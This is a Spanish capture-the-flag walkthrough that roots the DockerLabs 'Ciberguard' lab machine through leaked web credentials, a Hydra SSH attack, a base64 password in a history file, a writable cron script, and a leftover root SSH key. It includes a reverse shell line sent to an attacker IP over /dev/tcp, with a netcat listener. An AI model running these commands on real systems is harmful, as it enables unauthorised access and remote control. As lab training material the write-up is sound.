Ciberguard DockerLabs (Intermediate)
Instalación
Cuando obtenemos el .zip nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente.
unzip ciberguard.zipNos lo descomprimira y despues montamos la maquina de la siguiente forma.
bash auto_deploy.sh ciberguard.tarInfo:
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarlaPor lo que cuando terminemos de hackearla, le damos a Ctrl+C y nos eliminara la maquina para que no se queden archivos basura.
Escaneo de puertos
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>nmap -sCV -p<PORTS> <IP>Info:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-07 13:25 EDT
Nmap scan report for bicho.dl (172.17.0.2)
Host is up (0.000060s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 01:f6:3a:98:23:dc:8b:00:f0:5c:d5:50:07:f9:ec:e7 (ECDSA)
|_ 256 b0:4e:cb:2a:e0:ac:cf:4c:14:7b:23:57:00:6d:12:1d (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: CyberGuard - Seguridad Digital
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.52 secondsVeremos que hay una pagina web alojada en el puerto 80, si entramos dentro veremos una pagina como de una empresa llamada ciberguard, aparentemente no veremos nada interesante, por lo que vamos a realizar un poco de fuzzing a ver si encontramos algo mas interesante.
Vemos que hay un panel de login en la pagina, por lo que podemos creer que puede haber alguna mala configuracion en algun script que maneje la autenticacion.
Si inspeccionamos el codigo y bajamos abajo del todo veremos esto:
<script src="archiv/script.js"></script>Si entramos dentro veremos que esta realizando la validacion de las credenciales para entrar al panel de administracion, pero si bajamos abajo del todo, estara la lista de los usuarios validos con sus contraseñas en texto plano:
const usuariosPermitidos = {
'admin': 'CyberSecure123',
'cliente': 'Password123',
'chloe' : 'chloe123'
};Por lo que vamos a probar a loguearnos con el usuario admin, si lo hacemos veremos que nos carga el panel de administracion de forma correcta.
Pero no veremos nada interesante, por lo que vamos a probar a crearnos un diccionario de usuarios y passwords a ver si de las que estan publicas puede haber alguna que sea valida a nivel de sistema.
users.txt
admin
cliente
chloepass.txt
CyberSecure123
Password123
chloe123Escalate user chloe
Hydra
hydra -L users.txt -P pass.txt ssh://<IP>/ -t 64 -IInfo:
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-07 13:48:09
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2 login: chloe password: chloe123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-07 13:48:13Veremos que hemos encontrado unas credenciales validas, por lo que vamos a conectarnos por SSH con dicho usuario.
SSH
ssh chloe@<IP>Metemos como contraseña chloe123 y veremos que estamos dentro.
Escalate user veronica
Vamos a ver cuantos ususarios encontramos en el sistema:
cat /etc/passwd | grep "/bin/bash"Info:
root:x:0:0:root:/root:/bin/bash
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
veronica:x:1001:1001:,,,:/home/veronica:/bin/bash
pablo:x:1002:1002:,,,:/home/pablo:/bin/bash
chloe:x:1003:1003:,,,:/home/chloe:/bin/bashVemos que hay varios usuarios, pero si listamos la home entera veremos lo siguiente:
total 24
drwxr-xr-x 1 root root 4096 Apr 16 23:03 .
drwxr-xr-x 1 root root 4096 May 7 13:24 ..
drwxr-x--- 1 chloe chloe 4096 Apr 18 22:14 chloe
drwxr-x--- 1 pablo pablo 4096 May 2 18:11 pablo
drwxr-x--- 2 ubuntu ubuntu 4096 Jan 26 22:09 ubuntu
drwxr-xrwx 1 veronica veronica 4096 Apr 18 16:35 veronicaVemos que en la carpeta del usuario llamado veronica tiene todos los permisos, si entramos dentro veremos varios archivos, si vamos leyendo cada uno de ellos, veremos uno muy interesante en esta parte.
cat .bash_historyInfo:
dmVyb25pY2ExMjMKVeremos que esta codificado en Base64, si lo decodificamos veremos:
veronica123Pero no funcionara si lo intentamos, por lo que vamos a intentarlo directamente con el Base64.
su veronicaMetemos como contraseña dmVyb25pY2ExMjMK y veremos que seremos dicho usuario.
Escalate user pablo
Vamos a pasarnos el linpeas.sh a la maquina victima utilizando desde el host la herramienta scp.
Primero nos descargamos el linpeas.sh:
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.shAhora ejecutamos lo siguiente para pasarnos el archivo.
scp linpeas.sh chloe@<IP>:/tmpMetemos como contraseña chloe123 y veremos que funciono, ahora si vamos a la carpeta /tmp de la maquina victima, veremos el binario, lo ejecutaremos de la siguiente forma:
cd /tmp
chmod +x linpeas.sh
./linpeas.shDe toda la informacion que nos da, vemos una cosa muy interesante, que sera la siguiente:
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; }
47 6 * * 7 root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; }
52 6 1 * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; }
* * * * * pedro /home/veronica/.local/script-h.sh > /tmp/hora/hora.log 2>&1Vemos que hay un crontab que esta ejecutando el usuario pablo un script que esta en la home de veronica, por lo que vamos a ver si hay alguna vulnerabilidad para ser el usuario pablo.
Vamos a ver que procesos estan sucediendo dentro del sistema con un script llamado pspy64.
URL = Download pspy64
Una vez que nos lo hayamos descargado, lo pasamos con la misma herramienta scp.
scp pspy64 chloe@<IP>:/tmpMetemos como contraseña chloe123 y con esto se habra pasado de forma correcta, ahora en la maquina victima lo ejecutamos de la siguiente forma:
cd /tmp
./pspy64Info:
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2025/05/07 14:29:39 CMD: UID=1003 PID=9777 | ./pspy64
2025/05/07 14:29:39 CMD: UID=1003 PID=228 | -bash
2025/05/07 14:29:39 CMD: UID=1003 PID=227 | sshd: chloe@pts/0
2025/05/07 14:29:39 CMD: UID=0 PID=216 | sshd: chloe [priv]
2025/05/07 14:29:39 CMD: UID=0 PID=102 | tail -f /dev/null
2025/05/07 14:29:39 CMD: UID=0 PID=101 | /usr/sbin/cron -P
2025/05/07 14:29:39 CMD: UID=0 PID=95 | sshd: /usr/sbin/sshd [listener] 0 of 10-100 startups
2025/05/07 14:29:39 CMD: UID=33 PID=29 | /usr/sbin/apache2 -k start
2025/05/07 14:29:39 CMD: UID=33 PID=28 | /usr/sbin/apache2 -k start
2025/05/07 14:29:39 CMD: UID=0 PID=24 | /usr/sbin/apache2 -k start
2025/05/07 14:29:39 CMD: UID=0 PID=1 | /bin/sh -c service apache2 start && service ssh start && service cron start && tail -f /dev/null
2025/05/07 14:30:01 CMD: UID=0 PID=9786 | /usr/sbin/CRON -P
2025/05/07 14:30:01 CMD: UID=0 PID=9787 | /usr/sbin/CRON -P
2025/05/07 14:30:01 CMD: UID=1002 PID=9788 | /bin/sh -c /home/veronica/.local/script-h.sh > /tmp/hora/hora.log 2>&1
2025/05/07 14:30:01 CMD: UID=1002 PID=9789 |
2025/05/07 14:30:01 CMD: UID=1002 PID=9789 |
2025/05/07 14:31:01 CMD: UID=0 PID=9791 | /usr/sbin/CRON -P
2025/05/07 14:31:01 CMD: UID=0 PID=9792 | /usr/sbin/CRON -P Veremos que efectivamente se esta ejecutando el crontab por lo que vamos hacer lo siguiente.
Si listamos la carpeta .local veremos lo siguiente:
total 16
drwxrwxr-x 3 veronica veronica 4096 Apr 18 11:13 .
drwxr-xrwx 1 veronica veronica 4096 Apr 18 16:35 ..
-rwxrwx--x 1 pablo taller 121 Apr 17 17:23 script-h.sh
drwx------ 3 veronica veronica 4096 Apr 18 10:47 shareVemos que tanto el usuario pablo como el grupo taller pueden editar el script, si vemos a que grupos pertenecemos, veremos lo siguiente:
idInfo:
uid=1001(veronica) gid=1001(veronica) groups=1001(veronica),100(users),1004(taller)Veremos que somos de dicho grupo por lo que podremos editar el script, vamos hacer lo siguiente para generar una reverse shell.
cd /home/veronica/.local/
nano script-h.sh
#Dentro del nano
#!/bin/bash
.............................<RESTO DE CODIGO>...................................
sh -i >& /dev/tcp/<IP>/<PORT> 0>&1Lo guardamos y rapidamente nos ponemos a la escucha.
nc -lvnp <PORT>Ahora solo tendremos que esperar un rato, despues de esperar, si vamos a donde tenemos la escucha veremos lo siguiente:
listening on [any] 7777 ...
connect to [192.168.177.129] from (UNKNOWN) [172.17.0.2] 40728
bash: cannot set terminal process group (9878): Inappropriate ioctl for device
bash: no job control in this shell
pablo@31379bb8b4c2:~$ whoami
whoami
pabloVeremos que somos el usuario pablo por lo que vamos a sanitizar la shell.
Sanitización de shell (TTY)
script /dev/null -c bash# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>Escalate Privileges
Si hacemos sudo -l veremos lo siguiente:
Matching Defaults entries for pablo on 31379bb8b4c2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User pablo may run the following commands on 31379bb8b4c2:
(ALL) NOPASSWD: /usr/bin/python3 /opt/nllns/clean_symlink.py *.jpgVemos que podemos ejecutar el binario python3 en la ruta absoluta establecida como el usuario root.
Si vamos a la carpeta /tmp veremos esto de aqui:
-rw------- 1 pablo pablo 3381 May 2 16:58 id_rsaVamos a probar si fuera la clave PEM del usuario root, por lo que nos la vamos a copiar y pegar en nuestra maquina host.
nano id_rsa
#Dentro del nano
<CLAVE_ID_RSA>Lo guardamos y establecemos los permisos necesarios.
chmod 600 id_rsaAhora vamos a probar a meternos como root desde SSH con la clave PEM.
ssh -i id_rsa root@<IP>Info:
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.12.13-amd64 x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Fri May 2 17:00:02 2025 from ::1
root@31379bb8b4c2:~# whoami
rootCon esto veremos que somos root por lo que habremos terminado la maquina.
Last updated